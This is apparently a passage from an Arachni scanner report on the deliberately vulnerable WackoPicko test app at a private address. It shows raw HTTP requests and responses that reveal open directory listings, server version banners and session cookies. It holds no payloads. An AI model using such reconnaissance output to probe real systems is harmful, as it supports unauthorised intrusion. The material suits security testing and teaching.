<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/
pointing to
http://192.168.0.26/WackoPicko/upload/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/upload/ | http://192.168.0.26/WackoPicko/upload/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 580
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/upload</title>
</head>
<body>
<h1>Index of /WackoPicko/upload</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="3/">3/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="againIxwsed">againIxwsed</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="againiJ42nH">againiJ42nH</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="doggie/">doggie/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="flowers/">flowers/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="foos/">foos/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="house/">house/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="quarters/">quarters/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="testing/">testing/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="toga/">toga/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="twister/">twister/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="twister_funeXz3uM">twister_funeXz3uM</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="twister_funxJObBz">twister_funxJObBz</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> 47K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="waterfall/">waterfall/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/css/blueprint/src/
pointing to
http://192.168.0.26/WackoPicko/css/blueprint/src/
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/blueprint/src/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:52:43 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 512
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/css/blueprint/src</title>
</head>
<body>
<h1>Index of /WackoPicko/css/blueprint/src</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/css/blueprint/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="forms.css">forms.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="grid.css">grid.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">6.1K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="grid.png">grid.png</a></td><td align="right">17-May-2011 21:25 </td><td align="right">206 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="ie.css">ie.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.0K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="print.css">print.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.8K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="reset.css">reset.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.1K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="typography.css">typography.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">3.1K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/blueprint/print.css HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:52:38 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Wed, 18 May 2011 01:25:57 GMT
ETag: "447e9-52d-4a382c53c9340"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 674
Content-Type: text/css
/* -----------------------------------------------------------------------
Blueprint CSS Framework 0.7.1
http://blueprintcss.googlecode.com
* Copyright (c) 2007-2008. See LICENSE for more info.
* See README for instructions on how to use Blueprint.
* For credits and origins, see AUTHORS.
* This is a compressed file. See the sources in the 'src' directory.
----------------------------------------------------------------------- */
/* print.css */
body {line-height:1.5;font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;color:#000;background:none;font-size:10pt;}
.container {background:none;}
hr {background:#ccc;color:#ccc;width:100%;height:2px;margin:2em 0;padding:0;border:none;}
hr.space {background:#fff;color:#fff;}
h1, h2, h3, h4, h5, h6 {font-family:"Helvetica Neue", Arial, "Lucida Grande", sans-serif;}
code {font:.9em "Courier New", Monaco, Courier, monospace;}
img {float:left;margin:1.5em 1.5em 1.5em 0;}
a img {border:none;}
p img.top {margin-top:0;}
blockquote {margin:1.5em;padding:1em;font-style:italic;font-size:.9em;}
.small {font-size:.9em;}
.large {font-size:1.1em;}
.quiet {color:#999;}
.hide {display:none;}
a:link, a:visited {background:transparent;font-weight:700;text-decoration:underline;}
a:link:after, a:visited:after {content:" (" attr(href) ") ";font-size:90%;}
server
using
GET
at
http://192.168.0.26/WackoPicko/test/
pointing to
http://192.168.0.26/WackoPicko/test/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/test/ | http://192.168.0.26/WackoPicko/test/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/test/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:49 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 110
Content-Type: text/html
<html>
<head> <title></title></head>
<body>
<a href="http://">text</a>
<script>
</script>
<frameset>
</frameset>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/users/
pointing to
http://192.168.0.26/WackoPicko/users/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/users/ | http://192.168.0.26/WackoPicko/users/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:49 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 519
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/users</title>
</head>
<body>
<h1>Index of /WackoPicko/users</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="check_pass.php">check_pass.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">584 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="home.php">home.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.6K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="login.php">login.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.3K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="logout.php">logout.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">176 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="register.php">register.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.9K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="sample.php">sample.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">125 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="similar.php">similar.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">778 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="view.php">view.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">833 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
